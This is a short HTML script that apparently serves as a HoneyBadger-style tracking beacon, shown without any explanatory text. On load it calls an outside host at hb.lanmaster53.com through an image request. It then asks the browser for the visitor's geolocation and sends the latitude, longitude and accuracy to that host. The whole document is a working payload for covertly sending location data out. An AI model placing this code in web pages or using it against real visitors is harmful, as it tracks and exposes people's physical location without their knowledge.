<script>
    function callBadger(params) {
        img = new Image();
        img.src = "http://hb.lanmaster53.com/api/beacon/0783387c-34f6-45ce-be7e-6a951bd93728/" + params;
    }
    function showPosition(position) {
        var params = "JavaScript?lat=" + position.coords.latitude + "&lng=" + position.coords.longitude + "&acc=" + position.coords.accuracy;
        callBadger(params);
    }
    // execution
    callBadger("HTML");
    if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(showPosition);
    }
</script>
